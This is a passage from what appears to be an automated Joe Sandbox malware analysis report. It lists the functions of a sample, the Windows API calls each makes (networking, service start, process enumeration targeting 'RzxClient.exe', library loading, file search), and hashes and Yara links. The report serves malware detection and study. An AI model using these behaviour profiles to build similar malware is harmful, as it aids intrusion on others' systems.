                                                                                  • _memset.LIBCMT ref: 6A6E3E2A
                                                                                    • Part of subcall function 6A6E46C0: _memset.LIBCMT ref: 6A6E46F0
                                                                                    • Part of subcall function 6A6E46C0: _swscanf.LIBCMT ref: 6A6E4739
                                                                                  • WSAStartup.WS2_32(00000202,?), ref: 6A6E3EA5
                                                                                  • gethostbyname.WS2_32(?), ref: 6A6E3EB3
                                                                                  • WSACleanup.WS2_32 ref: 6A6E3EBF
                                                                                  • inet_ntoa.WS2_32(?), ref: 6A6E3EEE
                                                                                  • WSACleanup.WS2_32 ref: 6A6E3F11
                                                                                    • Part of subcall function 6A6E39A0: _malloc.LIBCMT ref: 6A6E39D0
                                                                                    • Part of subcall function 6A6EE232: __CxxThrowException@8.LIBCMT ref: 6A6EE248
                                                                                    • Part of subcall function 6A6EE232: __EH_prolog3.LIBCMT ref: 6A6EE255
                                                                                    • Part of subcall function 6A6F1951: __EH_prolog3_catch_GS.LIBCMT ref: 6A6F195B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$Cleanup$Exception@8H_prolog3H_prolog3_catch_StartupThrow__time64_malloc_rand_swscanfgethostbynameinet_ntoa
                                                                                  • String ID: P
                                                                                  • API String ID: 3162985554-3110715001
                                                                                  • Opcode ID: cc4d28c8a6f7a50defdff56c37e41e414bbc04f38cbb21c955df2892dc812a89
                                                                                  • Instruction ID: c9b75bb3f2a5c5fa9cdf4e0b56275f5b24aa4ae01cb710e8240535c05d6d9b80
                                                                                  • Opcode Fuzzy Hash: cc4d28c8a6f7a50defdff56c37e41e414bbc04f38cbb21c955df2892dc812a89
                                                                                  • Instruction Fuzzy Hash: 2AF1B17150D7818FC310CF68C898B9BB7E5BF85318F054A2CE5A987291EF71E909CB92
                                                                                  Function 0BE9650F Relevance: 15.1, APIs: 10, Instructions: 101stringlibrarythreadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 0BE9651F
                                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 0BE9652C
                                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 0BE96532
                                                                                  • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0BE9655D
                                                                                  • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 0BE965B2
                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 0BE965C2
                                                                                  • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 0BE965EE
                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 0BE965FE
                                                                                  • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 0BE96628
                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?), ref: 0BE96638
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                  • API String ID: 1599918012-2375825460
                                                                                  • Opcode ID: 05b0b542523610251de946db635f4321980fe13030569db33167d055695d45a6
                                                                                  • Instruction ID: 877314ab873336d5832d0dbe2b635e2e8bea4097d5b94e4133b933eaa86e6874
                                                                                  • Opcode Fuzzy Hash: 05b0b542523610251de946db635f4321980fe13030569db33167d055695d45a6
                                                                                  • Instruction Fuzzy Hash: 14317E71E0424ABEEF11DAE8DC85FEFB7BC9B08304F4051A2A144F2185D6B8DA588B51
                                                                                  Function 0040D170 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _strlen.LIBCMT ref: 0040D1C3
                                                                                  • _strlen.LIBCMT ref: 0040D1FE
                                                                                  • FindFirstFileA.KERNEL32(?,?,?,?,\*.*,?,?,00000000), ref: 0040D250
                                                                                  • FindNextFileA.KERNELBASE(?,000000FF,?,?,?,?,?), ref: 0040D3F7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFind_strlen$FirstNext
                                                                                  • String ID: \*.*
                                                                                  • API String ID: 4205833381-1173974218
                                                                                  • Opcode ID: 2024ccbab966aa7f774a15eb63cb095ac0cccf6a4ed6097bf02bd11eab9da717
                                                                                  • Instruction ID: 992d8479d4ffef6459bdcea7b4e73b1348d7e0bb5d5532fddc05d23374fc6197
                                                                                  • Opcode Fuzzy Hash: 2024ccbab966aa7f774a15eb63cb095ac0cccf6a4ed6097bf02bd11eab9da717
                                                                                  • Instruction Fuzzy Hash: D1711EB1D00118DBDB14EF95DC85BEEB774AF44304F1081AEE50A77281EB389A84CF95
                                                                                  Function 6A6E2680 Relevance: 12.1, APIs: 8, Instructions: 77serviceCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • OpenSCManagerA.SECHOST(00000000,00000000,000F003F,?,?,?,6A6E2BAA), ref: 6A6E26A0
                                                                                  • OpenServiceA.ADVAPI32(00000000,?,000F01FF,?,?,?,6A6E2BAA), ref: 6A6E26CF
                                                                                  • StartServiceA.ADVAPI32(00000000,00000000,00000000,?,000F01FF,?,?,?,6A6E2BAA), ref: 6A6E26E0
                                                                                  • GetLastError.KERNEL32(?,000F01FF,?,?,?,6A6E2BAA), ref: 6A6E26EA
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,000F01FF,?,?,?,6A6E2BAA), ref: 6A6E26F9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Service$Open$CloseErrorHandleLastManagerStart
                                                                                  • String ID:
                                                                                  • API String ID: 4248622755-0
                                                                                  • Opcode ID: 4b8f6c807d6c72219016f493ce2ba92736961acdddefa7746a1c60ae62a76bb8
                                                                                  • Instruction ID: 16a64fb800ef49bd46c0e380ba3fd4dae4b28e8b35b0494d55a35a753593d90f
                                                                                  • Opcode Fuzzy Hash: 4b8f6c807d6c72219016f493ce2ba92736961acdddefa7746a1c60ae62a76bb8
                                                                                  • Instruction Fuzzy Hash: 0D01C87338322527CE1115BE5C52BEB63D9AF83B63F1501A7F510D72418E42CC4969A4
                                                                                  Function 0040D640 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 134fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _strlen.LIBCMT ref: 0040D687
                                                                                  • _strlen.LIBCMT ref: 0040D6C2
                                                                                  • FindFirstFileA.KERNEL32(00000000,00000000,?,?,\*.*,?,?), ref: 0040D708
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _strlen$FileFindFirst
                                                                                  • String ID: \*.*
                                                                                  • API String ID: 734317389-1173974218
                                                                                  • Opcode ID: 2ebb9f7fd4e0f89792f7cbb8a9fb1c2490d336e6616642f5d1a08ffbea32d0be
                                                                                  • Instruction ID: de38e4cd173a30c8edfa01adb7868d3bfde8b501e1eb6e5a615f5dffb6eec6dc
                                                                                  • Opcode Fuzzy Hash: 2ebb9f7fd4e0f89792f7cbb8a9fb1c2490d336e6616642f5d1a08ffbea32d0be
                                                                                  • Instruction Fuzzy Hash: 46512BB1D10118DBDB14EFA5DC41BEEB374AF54304F5085AAE50AB7281EB389E88CF85
                                                                                  Function 6A6EF35B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _strcpy_s.LIBCMT ref: 6A6EF38D
                                                                                    • Part of subcall function 6A701068: __getptd_noexit.LIBCMT ref: 6A701068
                                                                                  • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 6A6EF3A5
                                                                                  • __snwprintf_s.LIBCMT ref: 6A6EF3DA
                                                                                  • LoadLibraryA.KERNELBASE(?), ref: 6A6EF415
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoLibraryLoadLocale__getptd_noexit__snwprintf_s_strcpy_s
                                                                                  • String ID: LOC
                                                                                  • API String ID: 1155623865-519433814
                                                                                  • Opcode ID: 707ee6d3bf3b40115295a3f8df3b670b693dd821ee0e1dbcb974e190aae7cc1f
                                                                                  • Instruction ID: 140711c8b5df28e5d05486591bd875044b8c053ebf795bf831c659cacc2272cf
                                                                                  • Opcode Fuzzy Hash: 707ee6d3bf3b40115295a3f8df3b670b693dd821ee0e1dbcb974e190aae7cc1f
                                                                                  • Instruction Fuzzy Hash: F221D5B1646308ABDB259A64EC49BD936FCAF02318F0144A1E204A7082DF748D498AA5
                                                                                  Function 6A6DAFE0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63processCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 6A6DB005
                                                                                  • Process32First.KERNEL32(00000000,00000000), ref: 6A6DB030
                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 6A6DB069
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process32$CreateFirstNextSnapshotToolhelp32
                                                                                  • String ID: RzxClient.exe
                                                                                  • API String ID: 1238713047-3752695696
                                                                                  • Opcode ID: 2645c97dc46e5bd7cce5d2f904a072f1edc86ea2f0861a6980a96686be588b7f
                                                                                  • Instruction ID: fba79dd7461b3bab18d2f897fb755051af4694f8811116333b6e0bcc0b073b51
                                                                                  • Opcode Fuzzy Hash: 2645c97dc46e5bd7cce5d2f904a072f1edc86ea2f0861a6980a96686be588b7f
                                                                                  • Instruction Fuzzy Hash: 3B11C4715082459FD710DF24C844BFBB7E8EBC6348F418928E86487155FF35A6098792
                                                                                  Function 6A6F283E Relevance: 6.1, APIs: 4, Instructions: 89filenetworkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileInternetRead_memset
                                                                                  • String ID:
                                                                                  • API String ID: 707442687-0
                                                                                  • Opcode ID: 71fe06faa2752822593a83f66e1c1ff1f986a3910be3a6f6e0600db4f9e74443
                                                                                  • Instruction ID: e194d629d108fbb51f68056c26d611193448549265ea753812b0d8ad5be48cd3
                                                                                  • Opcode Fuzzy Hash: 71fe06faa2752822593a83f66e1c1ff1f986a3910be3a6f6e0600db4f9e74443
                                                                                  • Instruction Fuzzy Hash: A0317A31200A84ABDB21CA66CE85B57BBF6BF44704F401869EA9286A91CB70F849CF50
                                                                                  Function 0BE9BA3C Relevance: 6.0, APIs: 4, Instructions: 37timefileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 0BE9BA57
                                                                                  • FindClose.KERNEL32(00000000,00000000,?), ref: 0BE9BA62
                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0BE9BA7B
                                                                                  • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 0BE9BA8C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileTime$Find$CloseDateFirstLocal
                                                                                  • String ID:
                                                                                  • API String ID: 2659516521-0
                                                                                  • Opcode ID: 77f7bff484900b814cc936b64d7b40d22d6c53ce79e228437b2252b9b694752c
                                                                                  • Instruction ID: 17996ad5ddce9d3aa7b005307f6a50f1c41d4f1585652316ad338689649605ea
                                                                                  • Opcode Fuzzy Hash: 77f7bff484900b814cc936b64d7b40d22d6c53ce79e228437b2252b9b694752c
                                                                                  • Instruction Fuzzy Hash: F4F012B2D1030C6ACF20EAF4AC859CFB3AC5F05314F105792B518D2191EB749B5C9B54
                                                                                  Function 0044CEC4 Relevance: 4.6, APIs: 3, Instructions: 74COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _strcpy_s.LIBCMT ref: 0044CEF6
                                                                                  • GetLocaleInfoA.KERNEL32(?,00000800,00000003,?,00000004), ref: 0044CF0F
                                                                                  • __snwprintf_s.LIBCMT ref: 0044CF43
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoLocale__snwprintf_s_strcpy_s
                                                                                  • String ID:
                                                                                  • API String ID: 536295136-0
                                                                                  • Opcode ID: 942436a8f9b23510ba3310b5877ffc357eb2a63220e7dd55d68372e9cbefa485
                                                                                  • Instruction ID: e0257aa415c2c4a0a6f779bfa7437446c46c9f8c33bef41605744545bdd438e9
                                                                                  • Opcode Fuzzy Hash: 942436a8f9b23510ba3310b5877ffc357eb2a63220e7dd55d68372e9cbefa485
                                                                                  • Instruction Fuzzy Hash: 1D11EB72A012087AE721BA759C86FEA329D9F06754F0404B7B604971D1EA7C4D0E86AE
                                                                                  Function 0043B780 Relevance: 3.4, Strings: 2, Instructions: 939COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: i D$i D
                                                                                  • API String ID: 0-2784904218
                                                                                  • Opcode ID: 04d27a4eec90ba593fc638a051d510959884ebf6b1a6a849cc3ce5775d59a0ef
                                                                                  • Instruction ID: 0b6167360e2d40c43f470e149b88c64e9b0c9e577cd832f6c516e9c9d7a5efac
                                                                                  • Opcode Fuzzy Hash: 04d27a4eec90ba593fc638a051d510959884ebf6b1a6a849cc3ce5775d59a0ef
                                                                                  • Instruction Fuzzy Hash: E1A29374A00219CFDB18CF98C891BAEBBB2FF88304F249159D5156B395D738AD42CF95
                                                                                  Function 0042FD40 Relevance: 3.0, APIs: 2, Instructions: 30nativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 0042FD62
                                                                                  • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 0042FD7A
                                                                                  Memory Dump Source
